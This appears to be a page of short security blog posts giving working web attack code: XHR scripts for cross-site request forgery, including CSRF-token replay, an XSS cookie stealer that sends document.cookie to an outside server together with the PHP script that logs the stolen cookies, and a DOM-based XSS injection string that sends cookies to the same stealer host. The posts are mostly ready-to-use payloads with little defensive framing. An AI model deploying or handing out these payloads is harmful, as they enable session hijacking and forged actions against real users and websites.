Category: javascript

bookmark_borderXHR CSRF exploit

Posted on by Kael

With out filter and regular form :

var target = "https://target.com";
var params = "username=myUsername&password=myPassword";
var xhr = new XMLHttpRequest();  
xhr.open("POST", target, false); 
xhr.send(params);

With CSRF token filter and multipart/form-data form :

var res = null;
var target = "https://target.com";
// Fetch initial CSRF token
var xhr = new XMLHttpRequest();  
xhr.open("GET", target, false); 
xhr.send(null);
if ( xhr.readyState === 4 ) {
  // Emulate a new div to parse response data as DOM
  res = document.createElement( 'div' );
  res.innerHTML = xhr.responseText;
  res.querySelector("#token");
  token = res.querySelector("#token").value;
  // Send the payload
  xhr.open("POST", target, false);
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundarygBe7zTLe1GhTyPGA");
  xhr.send('------WebKitFormBoundarygBe7zTLe1GhTyPGA\n' +
        'Content-Disposition: form-data; name="username"\n\n' +
        'myUsername\n' +
        '------WebKitFormBoundarygBe7zTLe1GhTyPGA\n' +
        'Content-Disposition: form-data; name="password"\n\n' +
        'myPassword\n' +
        '------WebKitFormBoundarygBe7zTLe1GhTyPGA\n' +
        'Content-Disposition: form-data; name="token"\n\n' +
        token +'\n' +
        '------WebKitFormBoundarygBe7zTLe1GhTyPGA--');
  if ( xhr.readyState === 4 ) {
     // Log the result
     console.log(xhr.responseText);
  }
}

bookmark_borderXSS Cookie Stealer

Posted on by Kael

Two way :

  • Redirection
  • Hidden image load

Initialize a redirection to your cookie stealer on the vulnerable target :

<script type="text/javascript">
location.href = 'https://myserver.com/stealer.php?cookie='+ document.cookie;
</script>

Or load an image :

<script type="text/javascript">
image = new Image();
image.src='https://myserver.com/stealer.php?cookie='+ document.cookie;
</script>

Then set up your cookie stealer on your server :

<?php
// Get cookie given in parameter
$cookie = $_GET['cookie']; 
// Saving file and max size
$filename = 'intercept.txt';
$MAX_SIZE = 4096;
// If data is available, append it to the list
if ( $cookie ) {
  // Quick security to avoid file oversizing over time
  if ( file_exists($filename) && filesize($filename) > $MAX_SIZE ) {
    $option = 'w';
  }
  else {
    $option = 'a';
  }
  $fp = fopen($filename, $option);
  fputs($fp, $cookie . '\r\n');
  fclose($fp);
}
?>
// Redirect the user to a standard location
<script>location.replace('https://losnia.com');</script>

Result will be displayed in intercept.txt as following :

PRIVILEGE_COOKIE=IsI9P7dLS8oIOq4ckeNM2WfD6

bookmark_borderDOM based XSS exploit

Posted on by Kael

For a dictionary with user input data :

  • A clan name
  • An area

Even if JS keywords and most special characters are banned, a malevolent user can still manage to exploit the data.

For example, using advanced techniques such as characters escaping and updating to DOM, an attacker will be able to totally change a function to its will.

<script type="text/javascript">
this.character= {
                "player": "Kaƫl",
                "clan": "Losnia",
                "functions": {
                    "compute": this.compute,
                    "reset": this.reset,
                    "giveup": this.giveup
                },
                "area": "France"
            };
</script>
clan="/*
area=a*/,functions:{computer:this.compute,reset:this.reset,giveup:{d:window[ /locat/.source%2B/ion/.source]=/https:\/\/myserver.com\/stealer.php?c=/.source%2Bdocument.cookie}}//